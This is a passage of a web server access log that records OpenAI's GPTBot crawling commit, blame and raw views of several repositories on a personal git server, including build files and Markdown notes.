+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" -[17/Feb/2026:14:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176796] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" -[17/Feb/2026:14:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176798] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" -[17/Feb/2026:14:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 13492] [Gzip 5.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:14:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 11404] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:14:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10861] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10208] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10957] [Gzip 4.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10988] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153411] [Gzip 15.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:54:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.vscode/launch.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" -[17/Feb/2026:14:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.vscode/launch.json" -[17/Feb/2026:14:54:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.vscode/launch.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" -[17/Feb/2026:14:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.vscode/launch.json" -[17/Feb/2026:14:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659890] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" -[17/Feb/2026:14:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659892] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" -[17/Feb/2026:14:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10197] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" -[17/Feb/2026:14:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.vscode/launch.json" [Client 74.7.227.38] [Length 9798] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" -[17/Feb/2026:14:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10198] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" -[17/Feb/2026:14:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/.vscode/launch.json" [Client 74.7.227.38] [Length 10967] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" -[17/Feb/2026:14:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.vscode/launch.json" [Client 74.7.227.38] [Length 885] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" -[17/Feb/2026:14:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.vscode/launch.json" [Client 74.7.227.38] [Length 452] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" -[17/Feb/2026:14:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" -[17/Feb/2026:14:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" -[17/Feb/2026:14:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10990] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10863] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:54:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fREADME.md" [Client 74.7.227.38] [Length 23571] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" -[17/Feb/2026:14:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2f.venv%2fbin" [Client 74.7.227.38] [Length 19392] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:14:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18920] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" -[17/Feb/2026:14:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10486] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:54:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.vscode/launch.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.vscode/launch.json" -[17/Feb/2026:14:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.vscode/launch.json" -[17/Feb/2026:14:54:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.vscode/launch.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.vscode/launch.json" -[17/Feb/2026:14:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.vscode/launch.json" -[17/Feb/2026:14:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18909] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" -[17/Feb/2026:14:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10197] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10711] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18908] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" -[17/Feb/2026:14:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10777] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" -[17/Feb/2026:14:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16183] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" -[17/Feb/2026:14:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10933] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" -[17/Feb/2026:14:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25010] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:14:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10148] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:14:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10204] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:14:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:14:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 20673] [Gzip 14.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:14:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:14:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12511] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:14:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr 